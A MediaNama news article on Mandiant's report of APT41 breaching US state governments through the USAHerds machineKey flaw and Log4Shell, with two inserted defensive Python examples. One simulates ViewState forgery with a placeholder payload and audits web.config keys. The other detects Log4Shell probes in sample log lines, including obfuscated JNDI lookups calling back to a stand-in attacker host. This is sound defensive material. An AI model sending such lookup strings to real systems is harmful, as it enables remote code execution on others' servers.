Chinese state-sponsored cyberattacks on six US states should be a wake-up call for India

The hacking group behind these attacks is known for espionage and financial cybercrime and has previously targeted India.

A Chinese state-sponsored hacking group tracked as APT41 compromised computer systems in at least six US state governments, cybersecurity firm Mandiant revealed in a report published on March 8, 2022. The report does not name the states, but says the intrusions took place between May 2021 and February 2022 and documents significant new capabilities of APT41.

These cybersecurity incidents have taken place despite the US government announcing significant measures to overhaul the country’s cybersecurity practices over the last year. This should serve as a wake-up call for Indian policymakers as India still lacks a comprehensive cybersecurity policy and APT41 is a significant threat to government institutions and critical infrastructure in the subcontinent. APT41 is known to have targeted India in the past.

What vulnerabilities led to the cyberattacks?

According to the report, the hackers breached government networks by exploiting vulnerabilities in internet-facing web applications, primarily through the following two:

  1. USAHerds livestock health reporting system: USAHerds is a web application developed by Acclaim Systems and used by around 18 US states to track the health and density of livestock for disease traceability. The application shipped with a hard-coded ASP.NET machineKey, the validation and decryption keys that protect ViewState, instead of a unique key per installation as best practice requires (tracked as CVE-2021-44207). Because every installation used the same keys, an attacker who extracted them from one copy of the software could forge ViewState that passes the integrity check on any internet-facing instance, and the server's .NET deserialization of that forged ViewState gives remote code execution. “In most of the web application compromises, APT41 conducted .NET deserialization attacks; however, we have also observed APT41 exploiting SQL injection and directory traversal vulnerabilities,” the report stated.
  2. Java Log4j library: In December 2021, a critical vulnerability in the Apache Log4j logging library, known as Log4Shell (CVE-2021-44228), was disclosed. The flaw lets an attacker who can get a crafted JNDI lookup string into any field the application logs make the vulnerable server fetch and run attacker-controlled code. Because Log4j is embedded in millions of Java applications and servers worldwide, the bug was ripe for exploitation, and Mandiant says APT41 began exploiting it within hours of the disclosure. The group used it to install backdoors on victims' Linux servers, the report said.
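The USAHerds item above comes down to one property: a signing key that is the same in every installation is not a secret. The following Python is an added example, not code from the article, Mandiant or Acclaim Systems. It uses a simplified HMAC-over-payload scheme as a stand-in for ViewState's MAC, a constructed hard-coded key, and constructed web.config fragments, and shows a forged payload being accepted by a server sharing the key and rejected by one with its own key, followed by a small audit that flags fixed key literals in a web.config.

```python
"""Added example (not from the article, Mandiant or Acclaim Systems): why a
hard-coded, shared ASP.NET machineKey defeats ViewState integrity, plus a
small audit for such keys in web.config. The MAC scheme below is a
simplified stand-in for ViewState's, and every key and config fragment is
constructed for illustration."""
import base64
import hashlib
import hmac
import re
import secrets
from typing import Optional

TAG_LEN = 32  # HMAC-SHA256 output length


def sign(payload: bytes, validation_key: bytes) -> str:
    """Stand-in for a MAC-protected __VIEWSTATE: base64(payload || HMAC(key, payload))."""
    tag = hmac.new(validation_key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + tag).decode()


def verify(blob: str, validation_key: bytes) -> Optional[bytes]:
    """Return the payload if the MAC checks out, else None. A server only
    deserializes a payload that passes this check, so the key is the whole defence."""
    raw = base64.b64decode(blob)
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(validation_key, payload, hashlib.sha256).digest()
    return payload if hmac.compare_digest(tag, expected) else None


# Constructed: a key baked into the product and therefore present in every install.
SHARED_HARDCODED_KEY = bytes.fromhex("0123456789ABCDEF" * 4)


def forgery_demo() -> dict:
    """Attacker signs a malicious payload with the key pulled from their own copy
    of the software and replays it against two differently configured servers."""
    attacker_payload = b"<serialized gadget chain would stand here>"
    forged = sign(attacker_payload, SHARED_HARDCODED_KEY)
    per_install_key = secrets.token_bytes(32)  # what a correctly deployed server uses
    return {
        "server_with_shared_key_accepts": verify(forged, SHARED_HARDCODED_KEY) == attacker_payload,
        "server_with_unique_key_accepts": verify(forged, per_install_key) is not None,
    }


# Constructed web.config fragments: the weak setting and a corrected one.
WEAK_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

FIXED_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

MACHINEKEY_RE = re.compile(r"<machineKey\b([^>]*)>", re.IGNORECASE)
KEY_ATTR_RE = re.compile(r'(validationKey|decryptionKey)\s*=\s*"([^"]*)"', re.IGNORECASE)


def audit_machine_key(config_text: str) -> list:
    """One finding per validationKey/decryptionKey that is a fixed literal.
    A literal is not wrong by itself (a web farm needs one), but it must be
    unique to the deployment and never shipped inside the product."""
    findings = []
    for element in MACHINEKEY_RE.finditer(config_text):
        for name, value in KEY_ATTR_RE.findall(element.group(1)):
            if not value.lower().startswith("autogenerate"):
                findings.append(f"{name}: fixed {len(value)}-char literal in config")
    return findings


if __name__ == "__main__":
    print(forgery_demo())
    print(audit_machine_key(WEAK_WEB_CONFIG))   # two findings
    print(audit_machine_key(FIXED_WEB_CONFIG))  # []
```

`AutoGenerate,IsolateApps` is the ASP.NET default and is fine for a single server; a load-balanced deployment needs explicit keys, but those keys must be generated per deployment and kept out of the shipped product, since the audit above cannot tell a vendor-wide literal from a deployment-specific one.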
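For the Log4Shell item, the first question a state agency's security team would have asked is who was sending lookup strings at its servers during the window the report covers. The Python below is an added example, not code from the article or Mandiant: it scans constructed access-log lines (documentation-range IP addresses) for `${jndi:` lookups, folding the `${lower:}`, `${upper:}` and `${...:-x}` obfuscations and URL encoding that attackers used to evade naive string matches. It flags probe strings, not confirmed exploitation, and the obfuscation handling covers the common forms rather than every Log4j lookup.

```python
"""Added example (not from the article or Mandiant): flag Log4Shell probe
strings in web server logs, including common obfuscations. The log lines
are constructed and use documentation-range IP addresses."""
import re
from urllib.parse import unquote

# Constructed Apache/nginx-style access log lines.
SAMPLE_ACCESS_LOG = [
    '198.51.100.4 - - [11/Dec/2021:03:12:09 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain lookup in the User-Agent header
    '203.0.113.7 - - [11/Dec/2021:03:12:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    # nested lower/upper lookups to dodge a naive "${jndi:" match
    '203.0.113.7 - - [11/Dec/2021:03:12:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:rmi://203.0.113.7:1099/x}"',
    # URL-encoded, using the ${::-x} default-value trick, in the query string
    '203.0.113.7 - - [11/Dec/2021:03:12:12 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    # benign: the word jndi in a path is not a lookup
    '198.51.100.9 - - [11/Dec/2021:03:12:13 +0000] "GET /docs/jndi-overview.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

INNERMOST_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}")


def _resolve(body: str) -> "str | None":
    """Evaluate the lookups attackers use as obfuscation; None means leave as is."""
    head = body.lower()
    if head.startswith("lower:"):
        return body[6:].lower()
    if head.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:  # ${prefix:name:-default} and the bare ${::-x} form
        return body.split(":-", 1)[1]
    return None


def normalize(text: str) -> str:
    """URL-decode (twice, for double encoding), then fold innermost lookups
    until nothing changes, so nested tricks collapse to their plain form."""
    text = unquote(unquote(text))
    for _ in range(16):  # bounded so a crafted line cannot spin forever
        changed = False

        def fold(match: "re.Match") -> str:
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST_LOOKUP.sub(fold, text)
        if not changed:
            break
    return text.lower()


def find_log4shell_probes(lines: list) -> list:
    """Return (line_index, normalized lookup) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append((i, m.group(0)))
    return hits


if __name__ == "__main__":
    for idx, lookup in find_log4shell_probes(SAMPLE_ACCESS_LOG):
        print(idx, lookup)
```

Running it on the constructed lines reports lines 1, 2 and 3 and, for each, the de-obfuscated lookup with the callback host, which is what you would pivot on: the host or IP in the lookup is the attacker's LDAP, RMI or DNS listener, and any outbound connection from the server to it after the probe is the signal that the lookup actually fired.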

“We say ‘at least six states’ because there are likely more states affected, based on our research, analysis, and communications with law enforcement. We know that there are 18 states using USAHerds, so we assess that this is likely a broader campaign than the six states where we have confirmation,” Rufus Brown, a senior threat analyst at Mandiant, told The Verge.

What was the goal of APT41?

“The goals of this campaign are currently unknown, though Mandiant has observed evidence of APT41 exfiltrating Personal Identifiable Information (PII). Although the victimology and targeting of PII data is consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial gain,” the report stated.

Why is APT41 a serious threat?

APT stands for Advanced Persistent Threat and describes an actor that gains unauthorised access to a network and remains undetected there for a long time. The term is generally used to refer to state-sponsored hacking groups.


APT41 is known for carrying out both espionage and financial cybercrime, and this dual focus has earned it the nickname Double Dragon. The group has been active since 2012, and five of its members were placed on the FBI's cyber most wanted list following a US Department of Justice indictment in September 2020.

“APT41 is a prolific Chinese state-sponsored espionage group known to target organisations in both the public and private sectors and also conducts financially motivated activity for personal gain,” Mandiant said in its report before warning that the group is a constantly adapting threat with “new techniques, malware variants, evasion methods, and capabilities.”

“APT41’s recent activity against U.S. state governments consists of significant new capabilities, from new attack vectors to post-compromise tools and techniques. APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability. The group also demonstrates a willingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use. APT41 exploiting Log4J in close proximity to the USAHerds campaign showed the group’s flexibility to continue targeting U.S state governments through both cultivated and co-opted attack vectors. Through all the new, some things remain unchanged: APT41 continues to be undeterred by the U.S. Department of Justice (DOJ) indictment in September 2020.” – Mandiant

What is the US government’s response?

A spokesperson from the US Cybersecurity and Infrastructure Security Agency (CISA) told The Verge that the agency was aware of the threat and that:

“CISA is actively working with our JCDC [Joint Cyber Defense Collaborative] private sector partners, including Mandiant, and government partners to address this advanced persistent threat to state government agencies and assist impacted entities. We encourage all organisations and critical infrastructure entities impacted by cyber intrusions to report to CISA, and to visit CISA.gov to take action to protect themselves.”

While China has not yet commented on the Mandiant report, Liu Pengyu, the spokesman for the Chinese embassy in Washington, told South China Morning Post that China opposes “making groundless accusations against China on cybersecurity and other related issues.”

MediaNama is the premier source of information and analysis on Technology Policy in India.

© 2008-2021 Mixed Bag Media Pvt. Ltd. Developed By PixelVJ

Subscribe to our daily newsletter
Your email address:*
Please enter all required fields Click to hide
Correct invalid entries Click to hide

© 2008-2021 Mixed Bag Media Pvt. Ltd. Developed By PixelVJ